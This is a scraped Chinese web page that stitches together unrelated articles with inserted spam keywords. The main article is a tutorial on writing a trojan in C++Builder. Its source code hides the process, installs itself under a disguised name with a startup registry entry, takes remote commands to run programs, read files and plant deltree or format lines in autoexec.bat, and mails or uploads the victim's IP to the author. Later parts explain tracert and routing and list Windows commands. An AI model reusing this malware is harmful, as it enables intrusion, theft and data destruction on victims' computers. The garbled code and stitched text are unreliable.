皮皮网

【-2的源码】【熊猫烧源码】【dex源码查看】tracert源码 windows

来源:光线追踪gpu加速源码 时间:2024-12-29 09:15:07

1.木马是什么东西
2.tracert工作原理&路由原理
3.win10系统配置查看命令行

tracert源码 windows

木马是什么东西

       木马是如何编写的(一)

        特洛依木马这个名词大家应该不陌生,自从年“死牛崇拜”黑客小组公布Back Orifice以来,木马犹如平地上的惊雷,使在DosWindows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒,终于认识到的网络也有它邪恶的一面,一时间人心惶惶。-2的源码

        我那时在《电脑报》上看到一篇文章,大意是一个菜鸟被人用BO控制了,吓得整天吃不下饭、睡不着觉、上不了网,到处求救!呵呵,要知道,木马(Trojan)的历史是很悠久的:早在AT&T Unix和BSD Unix十分盛行的年代,木马是由一些玩程式(主要是C)水平很高的年轻人(主要是老美)用C或Shell语言编写的,基本是用来窃取登陆主机的口令,以取得更高的权限。那时木马的主要方法是诱骗先修改你的.profile文件,植入木马;当你登陆时将你敲入的口令字符存入一个文件,用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的熏陶下长大的,对网络可以说很陌生。直到Win9x横空出世,尤其是WinNt的普及,大大推动了网络事业的发展的时候,BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马(甚至在Win9x的“关闭程序”对话框可以看到进程)给了当时中国人极大的震撼,它在中国的网络安全方面可以说是一个划时代的软件。

        自己编写木马,听起来很Cool是不是?!木马一定是由两部分组成服务器程序(Server)和客户端程序(Client),服务器负责打开攻击的道路,就像一个内奸特务;客户端负责攻击目标,两者需要一定的熊猫烧源码网络协议来进行通讯(一般是TCP/IP协议)。为了让大家更好的了解木马攻击技术,破除木马的神秘感,我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马,使大家能更好地防范和查杀各种已知和未知的木马。

        首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在木马的基本原理上,我们选用可视化的BCB;Delphi也不错,但缺陷是不能继承已有的资源(如“死牛崇拜”黑客小组公布的BO源代码,是VC编写的,网上俯拾皆是);VB嘛,谈都不谈难道你还给受害者传一个1兆多的动态链接库Msvbvm.dll吗?

        启动C++Builder 5.0企业版,新建一个工程,添加三个VCL控件:一个是Internet页中的Server Socket,另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win和WinNt);后两个控件的作用是用来使程序具有FTP(File Transfer Protocol文件传输协议)和SMTP(Simple Mail Transfer Protocol简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。

        Form窗体是可视的,这当然是不可思议的。不光占去了大量的空间(光一个Form就有K之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有K左右那样。

        我们首先应该让我们的dex源码查看程序能够隐身。双击Form,首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘,其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此,只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程(Service Process)就可以了。不过该函数的声明在Borland预先打包的头文件中没有,那么我们只好自己来声明这个位于KERNEL.DLL中的鸟函数了。

        首先判断目标机的操作系统是Win9x还是WinNt:

       {

       DWORD dwVersion = GetVersion();

       // 得到操作系统的版本号

       if (dwVersion >= 0x)

       // 操作系统是Win9x,不是WinNt

        {

        typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);

        file://定义RegisterServiceProcess()函数的原型

        HINSTANCE hDLL;

        LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;

        hDLL = LoadLibrary("KERNEL");

        file://加载RegisterServiceProcess()函数所在的动态链接库KERNEL.DLL

        lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");

        file://得到RegisterServiceProcess()函数的地址

        lpRegisterServiceProcess(GetCurrentProcessId(),1);

        file://执行RegisterServiceProcess()函数,隐藏本进程

        FreeLibrary(hDLL);

        file://卸载动态链接库

        }

       }

        这样就终于可以隐身了(害我敲了这么多代码!)。为什么要判断操作系统呢?因为WinNt中的进程管理器可以对当前进程一览无余,因此没必要在WinNt下也使用以上代码(不过你可以使用其他的方法,这个留到后面再讲)。接着再将自己拷贝一份到%System%目录下,例如:C:\Windows\System,并修改注册表,以便启动时自动加载:

       {

       char TempPath[MAX_PATH];

       file://定义一个变量

       GetSystemDirectory(TempPath ,MAX_PATH);

       file://TempPath是system目录缓冲区的地址,MAX_PATH是缓冲区的大小,得到目标机的System目录路径

       SystemPath=AnsiString(TempPath);

       file://格式化TempPath字符串,使之成为能供编译器使用的样式

       CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi.exe").c_str() ,FALSE);

       file://将自己拷贝到%System%目录下,并改名为Tapi.exe,伪装起来

       Registry=new TRegistry;

       file://定义一个TRegistry对象,准备修改注册表,这一步必不可少

       Registry->RootKey=HKEY_LOCAL_MACHINE;

       file://设置主键为HKEY_LOCAL_MACHINE

       Registry->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE);

       file://打开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就创建之

       try

        {

        file://如果以下语句发生异常,跳至catch,以避免程序崩溃

        if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi.exe")

        Registry->WriteString("crossbow",SystemPath+"\\Tapi.exe");

        file://查找是否有“crossbow”字样的键值,并且是否为拷贝的目录%System%+Tapi.exe

        file://如果不是,就写入以上键值和内容

        }

       catch(...)

        {

        file://如果有错误,什么也不做

        }

       }

        好,FormCreate过程完成了,这样每次启动都可以自动加载Tapi.exe,lora 源码 下载并且在“关闭程序”对话框中看不见本进程了,木马的雏形初现。

        接着选中ServerSocket控件,在左边的Object Inspector中将Active改为true,这样程序一启动就打开特定端口,处于服务器工作状态。再将Port填入,这是木马的端口号,当然你也可以用别的。但是你要注意不要用以下的低端端口,因为这样不但可能会与基本网络协议使用的端口相冲突,而且很容易被发觉,因此尽量使用以上的高端端口(不过也有这样一种技术,它故意使用特定端口,因为如果引起冲突,Windows也不会报错 ^_^)。你可以看一看TNMFTP控件使用的端口,是号端口,这是FTP协议的专用控制端口(FTP Control Port);同理TNMSMTP的号端口也是SMTP协议的专用端口。

        再选中ServerSocket控件,点击Events页,双击OnClientRead事件,敲入以下代码:

       {

        FILE *fp=NULL;

        char * content;

        int times_of_try;

        char TempFile[MAX_PATH];

        file://定义了一堆待会儿要用到的变量

        sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win.BAT")).c_str());

        file://在%System%下建立一个文本文件Win.bat,作为临时文件使用

        AnsiString temp=Socket->ReceiveText();

        file://接收客户端(攻击者,也就是你自己)传来的数据

       }

        好,大门敞开了!接着就是修改目标机的各种配置了!^_^ 首先我们来修改Autoexec.bat和Config.sys吧:

       {

       if(temp.SubString(0,9)=="edit conf")

        file://如果接受到的字符串的前9个字符是“edit conf”

        {

        int number=temp.Length();

        file://得到字符串的长度

        int file_name=atoi((temp.SubString(,1)).c_str());

        file://将第个字符转换成integer型,存入file_name变量

        file://为什么要取第个字符,因为第个字符是空格字符

        content=(temp.SubString(,number-)+'\n').c_str();

        file://余下的字符串将被作为写入的内容写入目标文件

        FILE *fp=NULL;

        char filename[];

        chmod("c:\\autoexec.bat",S_IREADS_IWRITE);

        chmod("c:\\config.sys",S_IREADS_IWRITE);

        file://将两个目标文件的属性改为可读可写

        if(file_name==1)

        sprintf(filename,"%s","c:\\autoexec.bat");

        file://如果第个字符是1,就把Autoexec.bat格式化

        else if(file_name==2)

        sprintf(filename,"%s","c:\\config.sys");

        file://如果第个字符是1,就把Config.sys格式化

        times_of_try=0;

        file://定义计数器

        while(fp==NULL)

        {

        file://如果指针是空

        fp=fopen(filename,"a+");

        file://如果文件不存在,创建之;如果存在,准备在其后添加

        file://如果出错,文件指针为空,趋势判断源码这样就会重复

        times_of_try=times_of_try+1;

        file://计数器加1

        if(times_of_try>)

        {

        file://如果已经试了次了,仍未成功

        Socket->SendText("Fail By Open File");

        file://就发回“Fail By Open File”的错误信息

        goto END;

        file://跳至END处

        }

        }

        fwrite(content,sizeof(char),strlen(content),fp);

        file://写入添加的语句,例如deltree/y C:或者format/q/autotest C:,够毒吧?!

        fclose(fp);

        file://写完后关闭目标文件

        Socket->SendText("Sucess");

        file://然后发回“Success”的成功信息

        }

       }

       上回我们讲到如何修改目标机上的启动配置文件,这回我们就来查看目标机上的目录树和文件吧,这在客户端上使用“dir”命令,跟着敲?:

       {

       else if(temp.SubString(0,3)=="dir")

        {

        file://如果前3个字符是“dir”

        int Read_Num;

        char * CR_LF="\n";

        int attrib;

        char *filename;

        DIR *dir;

        struct dirent *ent;

        int number=temp.Length();

        file://得到字符串的长度

        AnsiString Dir_Name=temp.SubString(5,number-3);

        file://从字符串第六个字符开始,将后面的字符存入Dir_Name变量,这是目录名

        if(Dir_Name=="")

        {

        file://如果目录名为空

        Socket->SendText("Fail By Open DIR's Name");

        file://返回“Fail By Open DIR's Name”信息

        goto END;

        file://跳到END

        }

        char * dirname;

        dirname=Dir_Name.c_str();

        if ((dir = opendir(dirname)) == NULL)

        {

        file://如果打开目录出错

        Socket->SendText("Fail by your DIR's name!");

        file://返回“Fail By Your DIR's Name”信息

        goto END;

        file://跳到END

        }

        times_of_try=0;

        while(fp==NULL)

        {

        file://如果指针是NULL

        fp=fopen(TempFile,"w+");

        file://就创建system\Win.bat准备读和写;如果此文件已存在,则会被覆盖

        times_of_try=times_of_try+1;

        file://计数器加1

        if(times_of_try>)

        {

        file://如果已经试了次了,仍未成功(真有耐心!)

        Socket->SendText("Fail By Open File");

        file://就发回“Fail By Open File”的错误信息

        goto END;

        file://并跳到END处

        }

        }

        while ((ent = readdir(dir)) != NULL)

        {

        file://如果访问目标目录成功

        if(*(AnsiString(dirname)).AnsiLastChar()!='\\')

        file://如果最后一个字符不是“\”,证明不是根目录

        filename=(AnsiString(dirname)+"\\"+ent->d_name).c_str();

        file://加上“\”字符后将指针指向目录流

        else

        filename=(AnsiString(dirname)+ent->d_name).c_str();

        file://如果是根目录,则不用加“\”

        attrib=_rtl_chmod(filename, 0);

        file://得到目标文件的访问属性

        if (attrib & FA_RDONLY)

        file://“&”字符是比较前后两个变量,如果相同返回1,否则返回0

        fwrite(" R",sizeof(char),3,fp);

        file://将目标文件属性设为只读

        else

        fwrite(" ",sizeof(char),3,fp);

        file://失败则写入空格

        if (attrib & FA_HIDDEN)

        fwrite("H",sizeof(char),1,fp);

        file://将目标文件属性设为隐藏

        else

        fwrite(" ",sizeof(char),1,fp);

        file://失败则写入空格

        if (attrib & FA_SYSTEM)

        fwrite("S",sizeof(char),1,fp);

        file://将目标文件属性设为系统

        else

        fwrite(" ",sizeof(char),1,fp);

        file://失败则写入空格

        if (attrib & FA_ARCH)

        fwrite("A",sizeof(char),1,fp);

        file://将目标文件属性设为普通

        else

        fwrite(" ",sizeof(char),1,fp);

        file://失败则写入空格

        if (attrib & FA_DIREC)

        fwrite(" <DIR> ",sizeof(char),9,fp);

        file://将目标文件属性设为目录

        else

        fwrite(" ",sizeof(char),9,fp);

        file://失败则写入空格

        fwrite(ent->d_name,sizeof(char),strlen(ent->d_name),fp);

        file://将目录名写入目标文件

        fwrite(CR_LF,1,1,fp);

        file://写入换行

        }

        fclose(fp);

        file://关闭文件

        closedir(dir);

        file://关闭目录

        FILE *fp1=NULL;

        times_of_try=0;

        while(fp1==NULL)

        {

        fp1=fopen(TempFile,"r");

        file://打开Win.bat准备读

        times_of_try=times_of_try+1;

        file://计数器加1

        if(times_of_try>)

        {

        file://如果已经试了次了,仍未成功

        Socket->SendText("Fail By Open File");

        file://就发回“Fail By Open File”的错误信息

        goto END;

        file://并跳到END处

        }

        }

        AnsiString Return_Text="";

        char temp_content[];

        for(int i=0;i<;i++) temp_content[i]='\0';

        file://定义的一个空数组

        Read_Num=fread(temp_content,1,,fp1);

        file://从目标文件中读入前个字符

        while(Read_Num==)

        {

        Return_Text=Return_Text+temp_content;

        file://Return_Text变量加上刚才的个字符

        for(int i=0;i<;i++) temp_content[i]='\0';

        Read_Num=fread(temp_content,1,,fp1);

        file://重复

        };

        Return_Text=Return_Text+temp_content;

        file://Return_Text变量加上刚才的个字符

        fclose(fp1);

        file://关闭目标文件

        Socket->SendText(Return_Text);

        file://返回Return_Text变量的内容

        }

       }

        够长吧?!察看目录树这么费劲啊?!你后面可以用BCB中的各种列表框对Client.exe好好美化美化。接下来就是查看指定文件的内容了,Client将使用“type”命令,(手指累不累啊?):

       {

       else if(temp.SubString(0,4)=="type")

        {

        file://如果前4个字符是“type”

        int Read_Num;

        int number=temp.Length();

        AnsiString File_Name=temp.SubString(6,number-4);

        file://将目标文件流存入File_Name变量中

        times_of_try=0;

        while(fp==NULL)

        {

        fp=fopen(File_Name.c_str(),"r");

        file://打开目标文件准备读

        times_of_try=times_of_try+1;

        file://计数器加1

        if(times_of_try>)

        {

        file://如果已试了次了

        Socket->SendText("Fail By Open File");

        file://返回“Fail By Open File”的错误信息

        goto END;

        file://跳到END

        }

        }

        AnsiString Return_Text="";

        char temp_content[];

        for(int i=0;i<;i++) temp_content[i]='\0';

        file://定义一个空数组

        Read_Num=fread(temp_content,1,,fp);

        file://从目标文件中读入前个字符

        while(Read_Num==)

        {

        Return_Text=Return_Text+temp_content;

        file://Return_Text的内容加上刚才的字符

        for(int i=0;i<;i++) temp_content[i]='\0';

        Read_Num=fread(temp_content,1,,fp);

        file://重复

        };

        Return_Text=Return_Text+temp_content;

        file://Return_Text的内容加上刚才的字符

        fclose(fp);

        file://关闭目标文件

        Socket->SendText(Return_Text);

        file://返回Return_Text的内容,即你查看文件的内容

        }

       }

        咳咳!累死了!还是来点轻松的吧操纵目标机的光驱(注意:mciSendString()函数的声明在mmsystem.h头文件中):

       {

       else if(temp=="open")

        {

        file://如果收到的temp的内容是“open”

        mciSendString("set cdaudio door open", NULL, 0, NULL);

        file://就弹出光驱的托盘

        }

       else if(temp=="close")

        {

        file://如果收到的temp的内容是“close”

        mciSendString("Set cdaudio door closed wait", NULL, 0, NULL);

        file://就收入光驱的托盘。当然你也可以搞个死循环,让他的光驱好好活动活动!^_^

        }

       }

        接着就是交换目标机的鼠标左右键,代码如下:

       {

       else if(temp=="swap")

        {

        SwapMouseButton(1);

        file://交换鼠标左右键,简单吧?

        }

       }

        然后就是使目标机重新启动。但这里要区分WinNt和Win9xNT非常注重系统每个进程的权利,一个普通的进程是不应具备有调用系统的权利的,因此我们要赋予本程序足够的权限:

       {

       else if(temp=="reboot")

        {

        file://如果收到的temp的内容是“temp”

        DWORD dwVersion = GetVersion();

        file://得到操作系统的版本号

        if (dwVersion < 0x)

        {

        file://操作系统是WinNt,不是Win9x

        HANDLE hToken;

        TOKEN_PRIVILEGES tkp;

        file://定义变量

        OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES TOKEN_QUERY, &hToken);

        file://OpenProcessToken()这个函数的作用是打开一个进程的访问令牌

        file://GetCurrentProcess()函数的作用是得到本进程的句柄

        LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);

        file://LookupPrivilegeValue()的作用是修改进程的权限

        tkp.PrivilegeCount = 1;

        file://赋给本进程特权

        tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

        AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);

        file://AdjustTokenPrivileges()的作用是通知Windows NT修改本进程的权利

        ExitWindowsEx(EWX_REBOOT EWX_FORCE, 0);

        file://强行退出WinNt并重启

        }

        else ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0);

        file://强行退出Win9x并重启

        }

       }

        如果以上都不是,就让它在Dos窗口中执行传来的命令:

       {

       else

        {

        file://如果都不是

        char * CR_TF="\n";

        times_of_try=0;

        while(fp==NULL)

        {

        fp=fopen(TempFile,"w+");

        file://创建Win.bat,如果已存在就覆盖

        times_of_try=times_of_try+1;

        file://计数器加1

        if(times_of_try>)

        {

        Socket->SendText("Fail By Open File");

        file://返回“Fail By Open File”的信息

        goto END;

        file://跳到END

        }

        }

        fwrite(temp.c_str(),sizeof(char),strlen(temp.c_str()),fp);

        file://写入欲执行的命令

        fwrite(CR_TF,sizeof(char),strlen(CR_TF),fp);

        file://写入换行符

        fclose(fp);

        file://关闭Win.bat

        system(TempFile);

        file://执行Win.bat

        Socket->SendText("Success");

        file://返回“Success”信息

        }

       }

        你可以直接执行什么Ping和Tracert之类的命令来进一步刺探目标机的网络状况(判断是否是一个企业的局域网),然后可以进一步攻击,比如Deltree和Format命令。^_^

        到此,服务器程序的功能已全部完成,但还差容错部分未完成,这样才能避免程序因意外而崩溃。朋友,别走开!(未完待续)

        木马是如何编写的(三)

        武汉 周侃

        上次已编写完服务器端的各种功能,但还差容错部分还未完成,下面我们Go on! 其代码如下(照敲不误 ^_^):

       {

       END:;

        Socket->Close();

        file://关闭服务

        ServerSocket1->Active =true;

        file://再次打开服务

        if (NMSMTP1->Connected) NMSMTP1->Disconnect();

        file://如果SMTP服务器已连接则断开

        NMSMTP1->Host = "smtp..net";

        file://选一个好用的SMTP服务器,如、、sina和btamail

        NMSMTP1->UserID = "";

        file://你SMTP的ID

        try

        {

        NMSMTP1->Connect();

        file://再次连接

        }

        catch(...)

        {

        goto NextTime;

        file://跳到NextTime

        }

        NMSMTP1->PostMessage->FromAddress ="I don't know!";

        file://受害者的Email地址

        NMSMTP1->PostMessage->FromName = "Casualty";

        file://受害者的名字

        NMSMTP1->PostMessage->ToAddress->Text = "crossbow@.net";

        file://将信发到我的邮箱,这一步很关键

        NMSMTP1->PostMessage->Body->Text = AnsiString("Server Running on:") + NMSMTP1->LocalIP ;

        file://信的内容提示你“服务器正在运行”,并且告诉你受害者的目前的IP地址,以便连接

        NMSMTP1->PostMessage->Subject = "Server Running Now!";

        file://信的主题

        NMSMTP1->SendMail();

        file://发送!

        return;

        file://返回

       NextTime:

        NMFTP1->Host = "ftp.go..com";

        file://你的FTP服务器的地址

        NMFTP1->UserID = "";

        file://你的用户ID

        NMFTP1->Port = ;

        file://FTP端口号,一般为

        NMFTP1->Password = "";

        file://你的FTP的密码

        if(NMFTP1->Connected) NMFTP1->Disconnect();

        file://如果已连接就断开

        try

        {

        NMFTP1->Connect();

        file://再连接

        }

        catch(...)

        {

        return;

        file://返回

        }

        AnsiString SendToSite = "Server Running on: " + NMFTP1->RemoteIP;

        file://受害者的IP地址

        FILE * Upload;

        Upload = fopen(NMFTP1->RemoteIP.c_str(),"w+");

        file://创建一个新文件准备写,如果已存在就覆盖

        fwrite(SendToSite.c_str(),sizeof(char),SendToSite.Length(),Upload);

        file://写入以上的SendToSite的内容

        fclose(Upload);

        file://写完后关闭此文件

        NMFTP1->RemoveDir("public_html");

        file://删除public_html目录

        NMFTP1->Upload(NMFTP1->RemoteIP, NMFTP1->RemoteIP);

        file://上传!

       }

        啊,超长的OnClientRead事件终于写完了。最后别忘了要在此服务器源码文件中添加以下头文件:

       #include <stdlib.h>

       #include <dirent.h>

       #include <fcntl.h>

       #include <dos.h>

       #include <sys\stat.h>

       #include <winbase.h>

       #include <stdio.h>

       #include <process.h>

       #include <io.h>

       #include <mmsystem.h>

        至此,服务器端(Server)程序已全部

tracert工作原理&路由原理

       1:1 <1 ms <1 ms <1 ms proxy.huayuan.hy [...1]

        2 * ms ms ..2.3

        3 ms ms ms ...

        4 ms ms ms ..7.

        5 ms ms ms ..3.

        6 ms ms ms ..3.

        7 ms ms ms xd--5-a8.bta.net.cn [...5]

       Trace complete.

       看一下上面这个过程 应该不用解释了

       下面我们来分析一下 我们是怎么看到这个回显的

       大家都知道我们所发送的tracert数据包 属于icmp数据包的一种

       关于ttl的概念不知道能否理解

       ttl 就是生存时间的意思 也就是我们所发送的数据包 在转发过程中的寿命问题

       很好理解 如果寿命为0的话 就不能到达目的地 每经过一个三层设备我们的数据包的

       ttl值都会减一 如果减到0 就证明不能到达就会给我们的源主机一个回应显示

       并告知源主机 在哪个三层设备将这个生存值置0的 然后将这个三层设备的ip地址转发给

       源主机

       上面我们说的是ttl的一个原理和作用

       下面我们来说 tracert包的原理

       我们发送TRACERT包时 第一次的包的ttl值为1 这样到第一个三层设备那就会给

       源主机一个回应 并告知其IP

       依次类推 第二次发送的时候的TTL值等于2

       第三次为3 默认最大hop为

       也就是说ttl最大升到

       这样我门就能清楚的看到 我们的数据包是怎么到达目的地的

       2:当IP子网中的一台主机发送IP分组给同一IP子网的另一台主机时,它将直接把IP分组送到网络上,对方就能收到。而要送给不同IP子网上的主机时,它要选择一个能到达目的子网上的路由器,把IP分组送给该路由器,由路由器负责把IP分组送到目的地。如果没有找到这样的路由器,主机就把IP分组送给一个称为“缺省网关(default gateway)”的路由器上。“缺省网关”是每台主机上的一个配置参数,它是接在同一个网络上的某个路由器端口的IP地址。

        路由器转发IP分组时,只根据IP分组目的IP地址的网络号部分,选择合适的端口,把IP分组送出去。同主机一样,路由器也要判定端口所接的是否是目的子网,如果是,就直接把分组通过端口送到网络上,否则,也要选择下一个路由器来传送分组。路由器也有它的缺省网关,用来传送不知道往哪儿送的IP分组。这样,通过路由器把知道如何传送的IP分组正确转发出去,不知道的IP分组送给“缺省网关”路由器,这样一级级地传送,IP分组最终将送到目的地,送不到目的地的IP分组则被网络丢弃了。目前TCP/IP网络,全部是通过路由器互连起来的,Internet就是成千上万个IP子网通过路由器互连起来的国际性网络。网络称为以路由器为基础的网络(router based network),形成了以路由器为节点的“网间网”。在“网间网”中,路由器不仅负责对IP分组的转发,还要负责与别的路由器进行联络,共同确定“网间网”的路由选择和维护路由表。路由动作包括两项基本内容:寻径和转发。寻径即判定到达目的地的最佳路径,由路由选择算法来实现。由于涉及到不同的路由选择协议和路由选择算法,要相对复杂一些。为了判定最佳路径,路由选择算法必须启动并维护包含路由信息的路由表,其中路由信息依赖于所用的路由选择算法而不尽相同。路由选择算法将收集到的不同信息填入路由表中,根据路由表可将目的网络与下一站(nexthop)的关系告诉路由器。路由器间互通信息进行路由更新,更新维护路由表使之正确反映网络的拓扑变化,并由路由器根据量度来决定最佳路径。这就是路由选择协议(routing protocol),例如路由信息协议(RIP)、开放式最短路径优先协议(OSPF)和边界网关协议(BGP)等。

        转发即沿寻径好的最佳路径传送信息分组。路由器首先在路由表中查找,判明是否知道如何将分组发送到下一个站点(路由器或主机),如果路由器不知道如何发送分组,通常将该分组丢弃;否则就根据路由表的相应表项将分组发送到下一个站点,如果目的网络直接与路由器相连,路由器就把分组直接送到相应的端口上。这就是路由转发协议(routed protocol)。

        路由转发协议和路由选择协议是相互配合又相互独立的概念,前者使用后者维护的路由表,同时后者要利用前者提供的功能来发布路由协议数据分组。

win系统配置查看命令行

       win系统配置查看命令行(win查看电脑配置命令)1、运行里输入cmd,打开命令行

       2、用cd …可以回到上一级目录

       3、返回最开始的路径,用cd

       4、在同一磁盘下,用cd 目标路径跳转

       5、不在同一磁盘下,要用cd …命令,先跳转到另一磁盘,如跳转到c盘最上层目录,用d:可以跳转到D盘

       6、文件操作命令

       创建: md 文件名

       拷贝:copy 需要操作文件名 目标路径(相当于复制+粘贴)

       删除:del 文件名(会删除文件夹下所有非文件夹的文件但是文件夹会被保留)

       rd 文件名 (会删除当前的空文件夹,注意是当前哦)

       rd /s/q 目标文件名(会删除目标文件夹及文件夹下的所有文件)

       移动:move 需要操作文件名 目标路径(相当于剪切)

       重命名:ren 旧文件名 新文件名

       7、网络操作命令

       查看本机ip信息:ipconfig即可

       ping 主机ip或名字,一般常用于测试网络是否通畅

       net /? 获取具体帮助信息 ; netstat 主机名 查看主机当前tcp/ip连接状态;nbtstat 主机名 查看当前主机使用的netbios name

       tracert 主机:查看从你自己到目标逐级经过了哪些路径

       8、其他一些操作命令

       (1)tab键用来对当前路径下的文件进行选择

       键盘上的上下键可以用来对当前dos界面输入过的命令进行切换选择。

       (2)利用dos来设计电脑关机

       结合命令shutdown -s -t 0来实现电脑立即关机

       (3)常用的清屏和退出命令

       清屏:cls

       退出环境:exit()

       (4)打开电脑相关应用

       calc就是计算器

       mspaint就是画图工具

       notepad记事本

       9、清理电脑的缓存让电脑变得快一些,具体操作如下:

       win +r 打开命令行,记下来输入以下命令

       chkdsk #检查修复磁盘文件

       sfc /scannow #立即扫描所有受保护的系统文件的命令。

       shutdown -r -t 0 #立即重启

       %temp%即可搜索c盘下的临时文件,然后可以快速删除,解决c盘磁盘空间不足的问题

       、用命令行查看电脑硬件信息

       (1)如何在windows系统自带命令查看硬件信息,怎样dos命令查看硬盘和内存/CPU信息?

       在黑窗口下输入systeminfo执行,即可看到几乎所有想知道的系统信息,甚至包括机器上已安装的网卡及其IP。

       (2) 如何从系统中 查看主板上内存条的数量。

       最佳答案: 在cmd命令下 输入:wmic memorychip list brief 就会看到内存条的数量。

       (3)如何用Windows系统自带命令查看硬件信息?

       Win+R,打开“运行”,直接输入:

       输入sysdm.cpl, 打开系统属性。

       输入dxdiag,打开DirectX诊断工具。

       输入msinfo,打开系统信息。

       输入devmgmt.msc,打开设备管理。

       输入taskmgr(或按Ctrl+Alt+Delete)打开任务管理器,在性能选项卡上看物理内存和pagefile。

       输入winver查看系统版本。

       (4)怎样用dos命令(cmd命令中输入)查看硬盘、内存和CPU信息?

       》查看磁盘信息:wmic freedisk,可以查看每一个盘的剩余空间。

       wmic diskdrive,可以看出牌子和大小。

       wmic logicaldisk,可以看到有几个盘,每一个盘的文件系统和剩余空间。

       wmic volume,每个盘的剩余空间量,其实上一个命令也可以查看的。

       fsutil volume diskfree c: 这个命令查看每一个卷的容量信息是很方便的。

       》查看CPU信息:

       wmic cpu上面显示的有位宽,最大始终频率,生产厂商,二级缓存等信息。

       》查看内存信息:

       wmic memorychip可以显示出内存条数、容量和速度。

       》查看BIOS信息:

       wmic bios主板型号、BIOS 版本。

       、查看所有安装的软件

       1)rpm -aq查看所有软件;查看指定名字的软件:rpm -aq|grep 软件名;可以使用:rpm --help查看详细参数;

       2)yum方法安装的,可以用yum list installed查找;

       3)以源码包自己编译安装的,例如.tar.gz或者tar.bz2形式的,只能看可执行文件是否存在。